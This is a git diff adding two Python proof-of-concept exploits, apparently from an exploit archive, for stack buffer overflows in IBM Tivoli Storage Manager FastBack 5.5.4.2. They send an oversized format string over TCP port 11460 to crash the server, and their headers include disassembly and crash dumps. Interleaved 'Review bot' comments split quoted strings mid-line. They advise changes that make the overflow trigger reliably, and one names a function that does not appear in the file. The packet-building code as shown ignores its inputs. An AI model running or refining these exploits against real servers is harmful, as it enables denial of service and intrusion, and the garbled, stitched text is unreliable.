
+ sys.exit(0) + + +if __name__ == "__main__": + main() diff --git a/platforms/windows/dos/38979.py b/platforms/windows/dos/38979.py new file mode 100755 index 000000000..732727959 --- /dev/null +++ b/platforms/windows/dos/38979.py @@ -0,0 +1,115 @@ +#!/usr/bin/python +# +################################################################################ +# +# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2 +# _FXCLI_SetConfFileChunk Stack Buffer Overflow Vulnerability +# Date: 14 December 2015 +# Author: Gianni Gnesa (gnix) +# +# Vendor Homepage: http://www.ibm.com/ +# Software Name: IBM Tivoli Storage Manager FastBack +# Software Version: 5.5.4.2 (x86) +# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager +# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy" +# (Version 5.5.4.2, Size: 120.7 MB) +# +# Tested on: Windows 7 Professional (x86) +# +################################################################################ +# +# Vulnerability: +# ============== +# +# The vulnerability is a stack buffer overflow in the _FXCLI_SetConfFileChunk +# function caused by the insecure usage of _sscanf while parsing user-controlled +# input. +# +# .text:00578D28 lea eax, [ebp+var_8] +# .text:00578D2B push eax +# .text:00578D2C lea ecx, [ebp+var_C] +# .text:00578D2F push ecx +# .text:00578D30 lea edx, [ebp+var_318] +# .text:00578D36 push edx +# .text:00578D37 lea eax, [ebp+var_4] +# .text:00578D3A push eax +# .text:00578D3B lea ecx, [ebp+Str1] <=== Buffer that will be overwritten +# .text:00578D41 push ecx +# .text:00578D42 push offset $SG128695 ; "File: %s 
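Review bot: `s.send(pkt)` in `main` is not guaranteed to write the whole ~49 KB buffer; `send` returns the byte count and the script never checks it, so a short write means the malformed packet never reaches `CLocation::GetLocationParams` and the crash silently fails to reproduce — use `s.sendall(pkt)`. As rendered here `create_pkt` never references `opcode`, `p1`, `p2` or `p3` (the usage string has also lost its argument placeholder), which looks like content dropped in extraction rather than the author's code, so the packet layout itself cannot be reviewed from this copy. `import time` is unused, and an `s.settimeout(10)` before `connect` would keep the PoC from hanging on a filtered port.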
From: %d To: %d ChunkLoc: %d FileLoc: %d" +# .text:00578D47 mov edx, [ebp+Src] +# .text:00578D4A push edx ; Src <=== Buffer under our control +# .text:00578D4B call _sscanf <=== Stack Buffer Overflow!!! +# +################################################################################ +# +# Crash: +# ====== +# +# (a20.ee8): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# eax=00000000 ebx=01cd4fb8 ecx=01eaca78 edx=776870b4 esi=01cd4fb8 edi=00000000 +# eip=41414141 esp=01eae324 ebp=41414141 iopl=0 nv up ei pl zr na pe nc +# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +# 41414141 ?? ??? +# +################################################################################ + +import sys +import time +import socket +from struct import pack + + +def create_pkt(opcode, p1="", p2="", p3=""): + + # psAgentCommand (0x30 bytes) + buf = "\x44" * 0xC + buf+= pack("i", len(buf)-4) + buf + + return buf + + +def main(): + if len(sys.argv) != 2: + print "Usage: %s \n" % sys.argv[0] + sys.exit(1) + + server = sys.argv[1] + port = 11460 + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((server, port)) + + pkt = create_pkt( opcode=0x534, + p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0), + p2 = "B" * 24000, + p3 = "C" * 24000 ) + + s.send(pkt) + s.close() + + print "[+] Packet sent." + sys.exit(0) + + +if __name__ == "__main__": + main() diff --git a/platforms/windows/dos/38980.py b/platforms/windows/dos/38980.py new file mode 100755 index 000000000..45110ba5d --- /dev/null +++ b/platforms/windows/dos/38980.py 
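Review bot: `s.send(pkt)` in `main` may deliver only part of the buffer (p1 alone is ~10 KB and p2/p3 add 48 KB); a partial write is returned, not raised, so the `File: %s ...` string that `_sscanf` must consume can be cut short and the overflow not trigger — `s.sendall(pkt)` is the correct call. `pack("i", ...)` uses the host's native byte order and alignment; a wire protocol should spell the format explicitly, e.g. `pack("<i", ...)`, so the PoC behaves the same on every host. The disassembly in the header is consistent with the claim (unbounded `%s` into `[ebp+Str1]`), but as rendered `create_pkt` does not use its arguments, which I take to be extraction loss rather than the original code. `import time` is unused and a socket timeout before `connect` would avoid hanging on a filtered port.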
@@ -0,0 +1,115 @@
+#!/usr/bin/python
+#
+################################################################################
+#
+# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
+# _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability
+# Date: 14 December 2015
+# Author: Gianni Gnesa (gnix)
+#
+# Vendor Homepage: http://www.ibm.com/
+# Software Name: IBM Tivoli Storage Manager FastBack
+# Software Version: 5.5.4.2 (x86)
+# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
+# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy"
+# (Version 5.5.4.2, Size: 120.7 MB)
+#
+# Tested on: Windows 7 Professional (x86)
+#
+################################################################################
+#
+# Vulnerability:
+# ==============
+#
+# The vulnerability is a stack buffer overflow in the _FXCLI_GetConfFileChunk
+# function caused by the insecure usage of _sscanf while parsing user-controlled
+# input.
+#
+# .text:0057898E lea eax, [ebp+var_210]
+# .text:00578994 push eax
+# .text:00578995 lea ecx, [ebp+var_108]
+# .text:0057899B push ecx
+# .text:0057899C lea edx, [ebp+var_20C]
+# .text:005789A2 push edx
+# .text:005789A3 lea eax, [ebp+var_4]
+# .text:005789A6 push eax
+# .text:005789A7 lea ecx, [ebp+var_104] <=== Buffer that will be overwritten
+# .text:005789AD push ecx
+# .text:005789AE push offset $SG128635 ; "File: %s 
From: %d To: %d ChunkLoc: %d FileLoc: %d"
+# .text:005789B3 mov edx, [ebp+Src]
+# .text:005789B6 push edx ; Src <=== Buffer under our control
+# .text:005789B7 call _sscanf <=== Stack Buffer Overflow!!!
+#
+################################################################################
+#
+# Crash:
+# ======
+#
+# (b44.9dc): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=00000000 ebx=01cd4fb8 ecx=01dacf8c edx=776870b4 esi=01cd4fb8 edi=00000000
+# eip=41414141 esp=01dae328 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
+# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+# 41414141 ?? ???
+#
+################################################################################
+
+import sys
+import time
+import socket
+from struct import pack
+
+
+def create_pkt(opcode, p1="", p2="", p3=""):
+
+ # psAgentCommand (0x30 bytes)
+ buf = "\x44" * 0xC
+ buf+= pack("i", len(buf)-4) + buf
+
+ return buf
+
+
+def main():
+ if len(sys.argv) != 2:
+ print "Usage: %s \n" % sys.argv[0]
+ sys.exit(1)
+
+ server = sys.argv[1]
+ port = 11460
+
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((server, port))
+
+ pkt = create_pkt( opcode=0x531,
+ p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0),
+ p2 = "B" * 24000,
+ p3 = "C" * 24000 )
+
+ s.send(pkt)
+ s.close()
+
+ print "[+] Packet sent."
+ sys.exit(0)
+
+
+if __name__ == "__main__":
+ main()
